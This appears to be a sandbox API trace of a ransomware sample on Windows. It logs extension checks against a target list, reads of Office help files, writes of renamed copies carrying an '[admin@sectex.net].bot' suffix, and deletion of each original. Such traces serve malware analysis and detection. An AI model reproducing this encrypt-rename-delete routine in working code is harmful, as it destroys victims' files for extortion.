	[0153.747] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\WINWORD.DEV.HXS") returned 63
	[0153.747] lstrlenW (lpString=".zip") returned 4
	[0153.747] lstrcmpiW (lpString1=".zip", lpString2=".HXS") returned 1
	[0153.747] lstrlenW (lpString=".rar") returned 4
	[0153.747] lstrcmpiW (lpString1=".rar", lpString2=".HXS") returned 1
	[0153.747] lstrlenW (lpString=".bz2") returned 4
	[0153.747] lstrcmpiW (lpString1=".bz2", lpString2=".HXS") returned -1
	[0153.747] lstrlenW (lpString=".7z") returned 3
	[0153.747] lstrcmpiW (lpString1=".7z", lpString2="HXS") returned -1
	[0153.747] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\WINWORD.DEV.HXS") returned 63
	[0153.747] lstrlenW (lpString=".dbf") returned 4
	[0153.747] lstrcmpiW (lpString1=".dbf", lpString2=".HXS") returned -1
	[0153.747] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\WINWORD.DEV.HXS") returned 63
	[0153.747] lstrlenW (lpString=".1cd") returned 4
	[0153.747] lstrcmpiW (lpString1=".1cd", lpString2=".HXS") returned -1
	[0153.747] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\WINWORD.DEV.HXS") returned 63
	[0153.747] lstrlenW (lpString=".jpg") returned 4
	[0153.747] lstrcmpiW (lpString1=".jpg", lpString2=".HXS") returned 1
	[0153.748] lstrcmpiW (lpString1=".HXC", lpString2=".bot") returned 1
	[0153.748] lstrlenW (lpString="WINWORD.DEV_COL.HXC") returned 19
	[0153.748] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\WINWORD.DEV_COL.HXC" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\winword.dev_col.hxc"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3dc
	[0153.748] GetFileSizeEx (in: hFile=0x3dc, lpFileSize=0xad0ff1c | out: lpFileSize=0xad0ff1c*=651) returned 1
	[0153.748] CloseHandle (hObject=0x3dc) returned 1
	[0153.748] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\WINWORD.DEV_COL.HXC" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\winword.dev_col.hxc")) returned 0x20
	[0153.748] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\WINWORD.DEV_COL.HXC.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\winword.dev_col.hxc.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0153.749] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\WINWORD.DEV_COL.HXC" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\winword.dev_col.hxc"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3dc
	[0153.749] SetFilePointerEx (in: hFile=0x3dc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xad0fec8 | out: lpNewFilePointer=0x0) returned 1
	[0153.749] SetFilePointerEx (in: hFile=0x3dc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xad0fec8 | out: lpNewFilePointer=0x0) returned 1
	[0153.749] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\WINWORD.DEV_COL.HXC.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\winword.dev_col.hxc.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2a0
	[0153.750] GetLastError () returned 0x0
	[0153.750] ReadFile (in: hFile=0x3dc, lpBuffer=0xb8a0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xad0fed4, lpOverlapped=0x0 | out: lpBuffer=0xb8a0020*, lpNumberOfBytesRead=0xad0fed4*=0x28b, lpOverlapped=0x0) returned 1
	[0153.752] WriteFile (in: hFile=0x2a0, lpBuffer=0xb8a0020*, nNumberOfBytesToWrite=0x290, lpNumberOfBytesWritten=0xad0fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb8a0020*, lpNumberOfBytesWritten=0xad0fc9c*=0x290, lpOverlapped=0x0) returned 1
	[0153.753] ReadFile (in: hFile=0x3dc, lpBuffer=0xb8a0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xad0fed4, lpOverlapped=0x0 | out: lpBuffer=0xb8a0020*, lpNumberOfBytesRead=0xad0fed4*=0x0, lpOverlapped=0x0) returned 1
	[0153.753] WriteFile (in: hFile=0x2a0, lpBuffer=0xb8a0020*, nNumberOfBytesToWrite=0xfa, lpNumberOfBytesWritten=0xad0fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb8a0020*, lpNumberOfBytesWritten=0xad0fc9c*=0xfa, lpOverlapped=0x0) returned 1
	[0153.753] SetEndOfFile (hFile=0x2a0) returned 1
	[0153.753] CloseHandle (hObject=0x2a0) returned 1
	[0153.753] SetFilePointerEx (in: hFile=0x3dc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xad0fec8 | out: lpNewFilePointer=0x0) returned 1
	[0153.753] SetEndOfFile (hFile=0x3dc) returned 1
	[0153.755] CloseHandle (hObject=0x3dc) returned 1
	[0153.755] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\WINWORD.DEV_COL.HXC.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0153.755] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\WINWORD.DEV_COL.HXC" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\winword.dev_col.hxc")) returned 1
	[0153.756] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\WINWORD.DEV_COL.HXC") returned 67
	[0153.756] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\WINWORD.DEV_COL.HXC") returned 67
	[0153.756] lstrlenW (lpString=".doc") returned 4
	[0153.756] lstrcmpiW (lpString1=".doc", lpString2=".HXC") returned -1
	[0153.756] lstrlenW (lpString=".docx") returned 5
	[0153.756] lstrcmpiW (lpString1=".docx", lpString2="L.HXC") returned -1
	[0153.756] lstrlenW (lpString=".pdf") returned 4
	[0153.756] lstrcmpiW (lpString1=".pdf", lpString2=".HXC") returned 1
	[0153.756] lstrlenW (lpString=".xls") returned 4
	[0153.756] lstrcmpiW (lpString1=".xls", lpString2=".HXC") returned 1
	[0153.756] lstrlenW (lpString=".xlsx") returned 5
	[0153.756] lstrcmpiW (lpString1=".xlsx", lpString2="L.HXC") returned -1
	[0153.756] lstrlenW (lpString=".ppt") returned 4
	[0153.756] lstrcmpiW (lpString1=".ppt", lpString2=".HXC") returned 1
	[0153.756] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\WINWORD.DEV_COL.HXC") returned 67
	[0153.756] lstrlenW (lpString=".zip") returned 4
	[0153.756] lstrcmpiW (lpString1=".zip", lpString2=".HXC") returned 1
	[0153.756] lstrlenW (lpString=".rar") returned 4
	[0153.756] lstrcmpiW (lpString1=".rar", lpString2=".HXC") returned 1
	[0153.756] lstrlenW (lpString=".bz2") returned 4
	[0153.756] lstrcmpiW (lpString1=".bz2", lpString2=".HXC") returned -1
	[0153.756] lstrlenW (lpString=".7z") returned 3
	[0153.756] lstrcmpiW (lpString1=".7z", lpString2="HXC") returned -1
	[0153.756] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\WINWORD.DEV_COL.HXC") returned 67
	[0153.756] lstrlenW (lpString=".dbf") returned 4
	[0153.757] lstrcmpiW (lpString1=".dbf", lpString2=".HXC") returned -1
	[0153.757] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\WINWORD.DEV_COL.HXC") returned 67
	[0153.757] lstrlenW (lpString=".1cd") returned 4
	[0153.757] lstrcmpiW (lpString1=".1cd", lpString2=".HXC") returned -1
	[0153.757] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\WINWORD.DEV_COL.HXC") returned 67
	[0153.757] lstrlenW (lpString=".jpg") returned 4
	[0153.757] lstrcmpiW (lpString1=".jpg", lpString2=".HXC") returned 1
	[0153.757] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\WINWORD.DEV_COL.HXC") returned 67
	[0153.757] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\WINWORD.DEV_COL.HXC") returned 67
	[0153.757] lstrlenW (lpString=".doc") returned 4
	[0153.757] lstrcmpiW (lpString1=".doc", lpString2=".HXC") returned -1
	[0153.757] lstrlenW (lpString=".docx") returned 5
	[0153.757] lstrcmpiW (lpString1=".docx", lpString2="L.HXC") returned -1
	[0153.757] lstrlenW (lpString=".pdf") returned 4
	[0153.757] lstrcmpiW (lpString1=".pdf", lpString2=".HXC") returned 1
	[0153.757] lstrlenW (lpString=".xls") returned 4
	[0153.757] lstrcmpiW (lpString1=".xls", lpString2=".HXC") returned 1
	[0153.757] lstrlenW (lpString=".xlsx") returned 5
	[0153.757] lstrcmpiW (lpString1=".xlsx", lpString2="L.HXC") returned -1
	[0153.757] lstrlenW (lpString=".ppt") returned 4
	[0153.757] lstrcmpiW (lpString1=".ppt", lpString2=".HXC") returned 1
	[0153.757] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\WINWORD.DEV_COL.HXC") returned 67
	[0153.757] lstrlenW (lpString=".zip") returned 4
	[0153.757] lstrcmpiW (lpString1=".zip", lpString2=".HXC") returned 1
	[0153.757] lstrlenW (lpString=".rar") returned 4
	[0153.757] lstrcmpiW (lpString1=".rar", lpString2=".HXC") returned 1
	[0153.757] lstrlenW (lpString=".bz2") returned 4
	[0153.757] lstrcmpiW (lpString1=".bz2", lpString2=".HXC") returned -1
	[0153.757] lstrlenW (lpString=".7z") returned 3
	[0153.758] lstrcmpiW (lpString1=".7z", lpString2="HXC") returned -1
	[0153.758] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\WINWORD.DEV_COL.HXC") returned 67
	[0153.758] lstrlenW (lpString=".dbf") returned 4
	[0153.758] lstrcmpiW (lpString1=".dbf", lpString2=".HXC") returned -1
	[0153.758] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\WINWORD.DEV_COL.HXC") returned 67
	[0153.758] lstrlenW (lpString=".1cd") returned 4
	[0153.758] lstrcmpiW (lpString1=".1cd", lpString2=".HXC") returned -1
	[0153.758] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\WINWORD.DEV_COL.HXC") returned 67
	[0153.758] lstrlenW (lpString=".jpg") returned 4
	[0153.758] lstrcmpiW (lpString1=".jpg", lpString2=".HXC") returned 1
	[0153.758] lstrcmpiW (lpString1=".HXT", lpString2=".bot") returned 1
	[0153.758] lstrlenW (lpString="WINWORD.DEV_COL.HXT") returned 19
	[0153.758] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\WINWORD.DEV_COL.HXT" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\winword.dev_col.hxt"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3dc
	[0153.758] GetFileSizeEx (in: hFile=0x3dc, lpFileSize=0xad0ff1c | out: lpFileSize=0xad0ff1c*=211) returned 1
	[0153.759] CloseHandle (hObject=0x3dc) returned 1
	[0153.759] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\WINWORD.DEV_COL.HXT" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\winword.dev_col.hxt")) returned 0x20
	[0153.759] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\WINWORD.DEV_COL.HXT.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\winword.dev_col.hxt.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0153.759] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\WINWORD.DEV_COL.HXT" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\winword.dev_col.hxt"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3dc
	[0153.759] SetFilePointerEx (in: hFile=0x3dc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xad0fec8 | out: lpNewFilePointer=0x0) returned 1
	[0153.759] SetFilePointerEx (in: hFile=0x3dc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xad0fec8 | out: lpNewFilePointer=0x0) returned 1
	[0153.759] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\WINWORD.DEV_COL.HXT.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\winword.dev_col.hxt.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2a0
	[0153.760] GetLastError () returned 0x0
	[0153.760] ReadFile (in: hFile=0x3dc, lpBuffer=0xb8a0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xad0fed4, lpOverlapped=0x0 | out: lpBuffer=0xb8a0020*, lpNumberOfBytesRead=0xad0fed4*=0xd3, lpOverlapped=0x0) returned 1
	[0153.761] WriteFile (in: hFile=0x2a0, lpBuffer=0xb8a0020*, nNumberOfBytesToWrite=0xe0, lpNumberOfBytesWritten=0xad0fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb8a0020*, lpNumberOfBytesWritten=0xad0fc9c*=0xe0, lpOverlapped=0x0) returned 1
	[0153.762] ReadFile (in: hFile=0x3dc, lpBuffer=0xb8a0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xad0fed4, lpOverlapped=0x0 | out: lpBuffer=0xb8a0020*, lpNumberOfBytesRead=0xad0fed4*=0x0, lpOverlapped=0x0) returned 1
	[0153.762] WriteFile (in: hFile=0x2a0, lpBuffer=0xb8a0020*, nNumberOfBytesToWrite=0xfa, lpNumberOfBytesWritten=0xad0fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb8a0020*, lpNumberOfBytesWritten=0xad0fc9c*=0xfa, lpOverlapped=0x0) returned 1
	[0153.762] SetEndOfFile (hFile=0x2a0) returned 1
	[0153.762] CloseHandle (hObject=0x2a0) returned 1
	[0153.762] SetFilePointerEx (in: hFile=0x3dc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xad0fec8 | out: lpNewFilePointer=0x0) returned 1
	[0153.762] SetEndOfFile (hFile=0x3dc) returned 1
	[0153.765] CloseHandle (hObject=0x3dc) returned 1
	[0153.765] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\WINWORD.DEV_COL.HXT.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0153.766] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\WINWORD.DEV_COL.HXT" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\winword.dev_col.hxt")) returned 1
	[0153.766] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\WINWORD.DEV_COL.HXT") returned 67
	[0153.766] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\WINWORD.DEV_COL.HXT") returned 67
	[0153.766] lstrlenW (lpString=".doc") returned 4
	[0153.766] lstrcmpiW (lpString1=".doc", lpString2=".HXT") returned -1
	[0153.766] lstrlenW (lpString=".docx") returned 5
	[0153.766] lstrcmpiW (lpString1=".docx", lpString2="L.HXT") returned -1
	[0153.766] lstrlenW (lpString=".pdf") returned 4
	[0153.766] lstrcmpiW (lpString1=".pdf", lpString2=".HXT") returned 1
	[0153.767] lstrlenW (lpString=".xls") returned 4
	[0153.767] lstrcmpiW (lpString1=".xls", lpString2=".HXT") returned 1
	[0153.767] lstrlenW (lpString=".xlsx") returned 5
	[0153.767] lstrcmpiW (lpString1=".xlsx", lpString2="L.HXT") returned -1
	[0153.767] lstrlenW (lpString=".ppt") returned 4
	[0153.767] lstrcmpiW (lpString1=".ppt", lpString2=".HXT") returned 1
	[0153.767] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\WINWORD.DEV_COL.HXT") returned 67
	[0153.767] lstrlenW (lpString=".zip") returned 4
	[0153.767] lstrcmpiW (lpString1=".zip", lpString2=".HXT") returned 1
	[0153.767] lstrlenW (lpString=".rar") returned 4
	[0153.767] lstrcmpiW (lpString1=".rar", lpString2=".HXT") returned 1
	[0153.767] lstrlenW (lpString=".bz2") returned 4
	[0153.767] lstrcmpiW (lpString1=".bz2", lpString2=".HXT") returned -1
	[0153.767] lstrlenW (lpString=".7z") returned 3
	[0153.767] lstrcmpiW (lpString1=".7z", lpString2="HXT") returned -1
	[0153.767] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\WINWORD.DEV_COL.HXT") returned 67
	[0153.767] lstrlenW (lpString=".dbf") returned 4
	[0153.767] lstrcmpiW (lpString1=".dbf", lpString2=".HXT") returned -1
	[0153.767] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\WINWORD.DEV_COL.HXT") returned 67
	[0153.767] lstrlenW (lpString=".1cd") returned 4
	[0153.767] lstrcmpiW (lpString1=".1cd", lpString2=".HXT") returned -1
	[0153.767] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\WINWORD.DEV_COL.HXT") returned 67
	[0153.767] lstrlenW (lpString=".jpg") returned 4
	[0153.767] lstrcmpiW (lpString1=".jpg", lpString2=".HXT") returned 1
	[0153.767] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\WINWORD.DEV_COL.HXT") returned 67
	[0153.767] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\WINWORD.DEV_COL.HXT") returned 67
	[0153.767] lstrlenW (lpString=".doc") returned 4
	[0153.767] lstrcmpiW (lpString1=".doc", lpString2=".HXT") returned -1
	[0153.767] lstrlenW (lpString=".docx") returned 5
	[0153.767] lstrcmpiW (lpString1=".docx", lpString2="L.HXT") returned -1
	[0153.767] lstrlenW (lpString=".pdf") returned 4
	[0153.768] lstrcmpiW (lpString1=".pdf", lpString2=".HXT") returned 1
	[0153.768] lstrlenW (lpString=".xls") returned 4
	[0153.768] lstrcmpiW (lpString1=".xls", lpString2=".HXT") returned 1
	[0153.768] lstrlenW (lpString=".xlsx") returned 5
	[0153.768] lstrcmpiW (lpString1=".xlsx", lpString2="L.HXT") returned -1
	[0153.768] lstrlenW (lpString=".ppt") returned 4
	[0153.768] lstrcmpiW (lpString1=".ppt", lpString2=".HXT") returned 1
	[0153.768] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\WINWORD.DEV_COL.HXT") returned 67
	[0153.768] lstrlenW (lpString=".zip") returned 4
	[0153.768] lstrcmpiW (lpString1=".zip", lpString2=".HXT") returned 1
	[0153.768] lstrlenW (lpString=".rar") returned 4
	[0153.768] lstrcmpiW (lpString1=".rar", lpString2=".HXT") returned 1
	[0153.768] lstrlenW (lpString=".bz2") returned 4
	[0153.768] lstrcmpiW (lpString1=".bz2", lpString2=".HXT") returned -1
	[0153.768] lstrlenW (lpString=".7z") returned 3
	[0153.768] lstrcmpiW (lpString1=".7z", lpString2="HXT") returned -1
	[0153.768] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\WINWORD.DEV_COL.HXT") returned 67
	[0153.768] lstrlenW (lpString=".dbf") returned 4
	[0153.768] lstrcmpiW (lpString1=".dbf", lpString2=".HXT") returned -1
	[0153.768] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\WINWORD.DEV_COL.HXT") returned 67
	[0153.768] lstrlenW (lpString=".1cd") returned 4
	[0153.768] lstrcmpiW (lpString1=".1cd", lpString2=".HXT") returned -1
	[0153.768] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\WINWORD.DEV_COL.HXT") returned 67
	[0153.768] lstrlenW (lpString=".jpg") returned 4
	[0153.768] lstrcmpiW (lpString1=".jpg", lpString2=".HXT") returned 1
	[0153.768] lstrcmpiW (lpString1=".HXK", lpString2=".bot") returned 1
	[0153.769] lstrlenW (lpString="WINWORD.DEV_F_COL.HXK") returned 21
	[0153.769] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\WINWORD.DEV_F_COL.HXK" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\winword.dev_f_col.hxk"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3dc
	[0153.769] GetFileSizeEx (in: hFile=0x3dc, lpFileSize=0xad0ff1c | out: lpFileSize=0xad0ff1c*=114) returned 1
	[0153.769] CloseHandle (hObject=0x3dc) returned 1
	[0153.769] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\WINWORD.DEV_F_COL.HXK" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\winword.dev_f_col.hxk")) returned 0x20
	[0153.769] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\WINWORD.DEV_F_COL.HXK.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\winword.dev_f_col.hxk.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0153.769] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\WINWORD.DEV_F_COL.HXK" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\winword.dev_f_col.hxk"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3dc
	[0153.770] SetFilePointerEx (in: hFile=0x3dc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xad0fec8 | out: lpNewFilePointer=0x0) returned 1
	[0153.770] SetFilePointerEx (in: hFile=0x3dc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xad0fec8 | out: lpNewFilePointer=0x0) returned 1
	[0153.770] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\WINWORD.DEV_F_COL.HXK.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\winword.dev_f_col.hxk.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2a0
	[0153.770] GetLastError () returned 0x0
	[0153.770] ReadFile (in: hFile=0x3dc, lpBuffer=0xb8a0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xad0fed4, lpOverlapped=0x0 | out: lpBuffer=0xb8a0020*, lpNumberOfBytesRead=0xad0fed4*=0x72, lpOverlapped=0x0) returned 1
	[0153.771] WriteFile (in: hFile=0x2a0, lpBuffer=0xb8a0020*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0xad0fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb8a0020*, lpNumberOfBytesWritten=0xad0fc9c*=0x80, lpOverlapped=0x0) returned 1
	[0153.772] ReadFile (in: hFile=0x3dc, lpBuffer=0xb8a0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xad0fed4, lpOverlapped=0x0 | out: lpBuffer=0xb8a0020*, lpNumberOfBytesRead=0xad0fed4*=0x0, lpOverlapped=0x0) returned 1
	[0153.772] WriteFile (in: hFile=0x2a0, lpBuffer=0xb8a0020*, nNumberOfBytesToWrite=0xfe, lpNumberOfBytesWritten=0xad0fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb8a0020*, lpNumberOfBytesWritten=0xad0fc9c*=0xfe, lpOverlapped=0x0) returned 1
	[0153.772] SetEndOfFile (hFile=0x2a0) returned 1
	[0153.772] CloseHandle (hObject=0x2a0) returned 1
	[0153.772] SetFilePointerEx (in: hFile=0x3dc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xad0fec8 | out: lpNewFilePointer=0x0) returned 1
	[0153.772] SetEndOfFile (hFile=0x3dc) returned 1
	[0153.778] CloseHandle (hObject=0x3dc) returned 1
	[0153.778] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\WINWORD.DEV_F_COL.HXK.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0153.778] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\WINWORD.DEV_F_COL.HXK" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\winword.dev_f_col.hxk")) returned 1
	[0153.779] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\WINWORD.DEV_F_COL.HXK") returned 69
	[0153.779] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\WINWORD.DEV_F_COL.HXK") returned 69
	[0153.779] lstrlenW (lpString=".doc") returned 4
	[0153.779] lstrcmpiW (lpString1=".doc", lpString2=".HXK") returned -1
	[0153.779] lstrlenW (lpString=".docx") returned 5
	[0153.779] lstrcmpiW (lpString1=".docx", lpString2="L.HXK") returned -1
	[0153.779] lstrlenW (lpString=".pdf") returned 4
	[0153.779] lstrcmpiW (lpString1=".pdf", lpString2=".HXK") returned 1
	[0153.779] lstrlenW (lpString=".xls") returned 4
	[0153.779] lstrcmpiW (lpString1=".xls", lpString2=".HXK") returned 1
	[0153.779] lstrlenW (lpString=".xlsx") returned 5
	[0153.779] lstrcmpiW (lpString1=".xlsx", lpString2="L.HXK") returned -1
	[0153.779] lstrlenW (lpString=".ppt") returned 4
	[0153.779] lstrcmpiW (lpString1=".ppt", lpString2=".HXK") returned 1
	[0153.779] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\WINWORD.DEV_F_COL.HXK") returned 69
	[0153.779] lstrlenW (lpString=".zip") returned 4
	[0153.779] lstrcmpiW (lpString1=".zip", lpString2=".HXK") returned 1
	[0153.779] lstrlenW (lpString=".rar") returned 4
	[0153.779] lstrcmpiW (lpString1=".rar", lpString2=".HXK") returned 1
	[0153.779] lstrlenW (lpString=".bz2") returned 4
	[0153.779] lstrcmpiW (lpString1=".bz2", lpString2=".HXK") returned -1
	[0153.779] lstrlenW (lpString=".7z") returned 3
	[0153.779] lstrcmpiW (lpString1=".7z", lpString2="HXK") returned -1
	[0153.779] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\WINWORD.DEV_F_COL.HXK") returned 69
	[0153.779] lstrlenW (lpString=".dbf") returned 4
	[0153.779] lstrcmpiW (lpString1=".dbf", lpString2=".HXK") returned -1
	[0153.780] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\WINWORD.DEV_F_COL.HXK") returned 69
	[0153.780] lstrlenW (lpString=".1cd") returned 4
	[0153.780] lstrcmpiW (lpString1=".1cd", lpString2=".HXK") returned -1
	[0153.780] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\WINWORD.DEV_F_COL.HXK") returned 69
	[0153.780] lstrlenW (lpString=".jpg") returned 4
	[0153.780] lstrcmpiW (lpString1=".jpg", lpString2=".HXK") returned 1
	[0153.780] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\WINWORD.DEV_F_COL.HXK") returned 69
	[0153.780] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\WINWORD.DEV_F_COL.HXK") returned 69
	[0153.780] lstrlenW (lpString=".doc") returned 4
	[0153.780] lstrcmpiW (lpString1=".doc", lpString2=".HXK") returned -1
	[0153.780] lstrlenW (lpString=".docx") returned 5
	[0153.780] lstrcmpiW (lpString1=".docx", lpString2="L.HXK") returned -1
	[0153.780] lstrlenW (lpString=".pdf") returned 4
	[0153.780] lstrcmpiW (lpString1=".pdf", lpString2=".HXK") returned 1
	[0153.780] lstrlenW (lpString=".xls") returned 4
	[0153.780] lstrcmpiW (lpString1=".xls", lpString2=".HXK") returned 1
	[0153.780] lstrlenW (lpString=".xlsx") returned 5
	[0153.780] lstrcmpiW (lpString1=".xlsx", lpString2="L.HXK") returned -1
	[0153.780] lstrlenW (lpString=".ppt") returned 4
	[0153.780] lstrcmpiW (lpString1=".ppt", lpString2=".HXK") returned 1
